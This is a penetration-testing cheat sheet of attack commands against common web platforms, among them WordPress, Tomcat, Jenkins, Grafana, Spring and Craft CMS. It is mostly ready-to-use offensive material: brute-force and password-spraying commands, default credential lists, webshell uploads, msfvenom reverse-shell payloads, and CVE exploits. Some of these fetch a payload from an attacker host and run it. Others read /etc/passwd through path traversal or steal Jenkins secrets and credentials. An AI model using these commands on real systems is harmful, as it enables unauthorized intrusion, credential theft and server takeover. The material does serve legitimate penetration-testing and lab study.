CMS / Servers / Others
00. Webroot
/var/www/html/ # Apache
/usr/local/nginx/html/ # Nginx
c:\inetpub\wwwroot\ # IIS
C:\xampp\htdocs\ # XAMPP
01. Wordpress
Scan
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>
## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>
## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
Bruteforce password/username
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>
## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
Username/Password
select user_login,user_pass from wp_users;
Webshell
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i
## Or
## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php
## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php
## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"
02. Joomla
## ------------------| Identify version
# Navigate to
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>
## ------------------| Run scan
joomscan -u <URL>
CVE-2023-23752 (Authentication bypass resulting in an information leak)
## ------------------| Affected Versions
Joomla! < 4.2.8
## ------------------| Manual exploitation
curl 'http://<IP>/api/index.php/v1/config/application?public=true'
## ------------------| Automated
git clone https://github.com/ThatNotEasy/CVE-2023-23752 && cd CVE-2023-23752
pip3 install -r requirements.txt
python3 joomla.py
03. Drupal
03.1 Enumerations
## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register
### Check access status
/user/<number>
/user/1
### 403 --> user exists
### 404 --> user doesn't exist
## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
03.2 Upload shell
## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed
## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save
## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview
04. Tomcat
## ------------------| Endpoint permissions
/manager/html # <--- roles="manager-gui"
/manager/text/list # <--- roles="manager-script" [If we have /manager, Then we can use curl to upload war file :)]
/host-manager/html # <--- roles="admin-gui"
## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/ # <--- does not work for uploading war files
/notexsits/..;/manager/ # <--- does not work for uploading war files
## Remember to put '/' at the end ^
## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>
## ------------------| Upload paths
/manager/deploy?war=file&path=/shell ## Tomcat6
/manager/text/deploy?path=/shell ## Tomcat7 and above
## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd
## ------------------| Manually Upload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
## Then put the shell.war file to \tomcat\webapps\shell.war directory
## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file.
## Now you can use http://<IP>/shell/
05. Nginx
## ------------------| If the config looks like this (no trailing slash after "/admin")
location /admin {
<--code-->
}
## ------------------| It may be vulnerable to path traversal (LFI); try this
admin../config.php
05. SharePoint / OWA
05.1 SharePoint
## ------------------| Important directories
/_layouts/viewlsts.aspx
05.2 OWA
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit
cd SprayingToolkit/
pip3 install -r requirements.txt
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt
## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
06. Jenkins
Interesting endpoints
/manage
/script
/credentials
Configuration files
## ------------------| Linux
/var/jenkins_home/config.xml
/var/jenkins_home/users/users.xml
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/users/admin_*/config.xml
/var/jenkins_home/secrets/hudson.util.Secret
/var/jenkins_home/secrets/initialAdminPassword
/var/lib/jenkins/config.xml
/var/lib/jenkins/users/users.xml
/var/lib/jenkins/credentials.xml
/var/lib/jenkins/secrets/master.key
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/secrets/hudson.util.Secret
/var/lib/jenkins/secrets/initialAdminPassword
## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\credentials.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\users.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
Reset password [Read full post from here]
## ------------------| Method I (Reset Password)
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## The bcrypt password hash is stored under the <passwordHash> tag [here I used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins
## ------------------| Method II (Decrypt Password using console)
## If you have access to /script, run the following in the script console
## Get the password hash from \users\<username>\config.xml
hudson.util.Secret.decrypt '<HASH>'
## ------------------| Method III (Decrypt Password offline)
## Download following files
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/secrets/hudson.util.Secret
## Get ssh keys
git clone https://github.com/hoto/jenkins-credentials-decryptor.git && cd jenkins-credentials-decryptor && make build
./bin/jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml -o text
## Get Password
pip install pycryptodome
CVE-2024-23897 | Jenkins <= 2.441
## ------------------| Manual
wget http://<JENKINS_URL>/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -s <JENKINS_URL> connect-node '@/etc/passwd'
java -jar jenkins-cli.jar -s <JENKINS_URL> reload-job '@/etc/passwd'
## ------------------| Automate
wget https://www.exploit-db.com/raw/51993 -O expo.py
python3 expo.py -u http://$IP:8080 -p /etc/passwd
Remote Code Execution
Create New Job
Schedule Method
Trigger Remotely Method
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]"
## Ex: curl "http://h4rithd:[email protected]:8080/job/TestRun/build?token=h4rithdToken"
07. Grafana
Config files
## ------------------|
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
Unauthorized reading of files in Grafana [CVE-2021-43798] - videoPOC
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
08. Consul
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p
09. Spring Framework
### Spring Boot version 2.6.5
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
Spring Cloud Function Vulnerability(CVE-2022-22963)
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
10. Craft CMS
## ------------------| Versions between 4.0.0-RC1 – 4.4.14
## Check for phpinfo
curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
## ------------------| RCE Path
## Create h4rithd.msl file
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="http://attacker_ip:8000/vuln.png" />
<write filename="/var/www/html/web/shell.php" />
</image>
## ------------------| Create the vuln.png
exiftool -comment="<?php phpinfo(); ?>" vuln.png
## ------------------| Exploit
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F '[email protected]'
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}'
curl -k "http://surveillance.htb/shell.php" -x localhost:8080 --output -
## ------------------| Metasploit
use exploit/multi/http/cmsms_object_injection_rce
set RHOSTS <IP>
set ForceExploit true
exploit
11. Nagios
## ------------------| Authenticate with API
### Create token
curl -ksX POST https://<HOST>/nagiosxi/api/v1/authenticate -d 'username=<USER>&password=<PASS>&valid_min=500'
### Login to the server
https://<HOST>/nagiosxi/?token=<TOKEN>
### Add new user
curl -XPOST --insecure "https://<HOST>/nagiosxi/api/v1/system/user?apikey=<KEY>&pretty=1" -d "username=h4rithd&password=h4rithd&name=h4rithd&email=h4rithd@localhost&auth_level=admin"
### Log in using the h4rithd:h4rithd creds
### Use sqlmap to get the admin API key
sqlmap -u "https://<HOST>/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<AUTH_TOKEN>" --level 5 --risk 3 -p id --batch -D nagiosxi --dump -T xi_users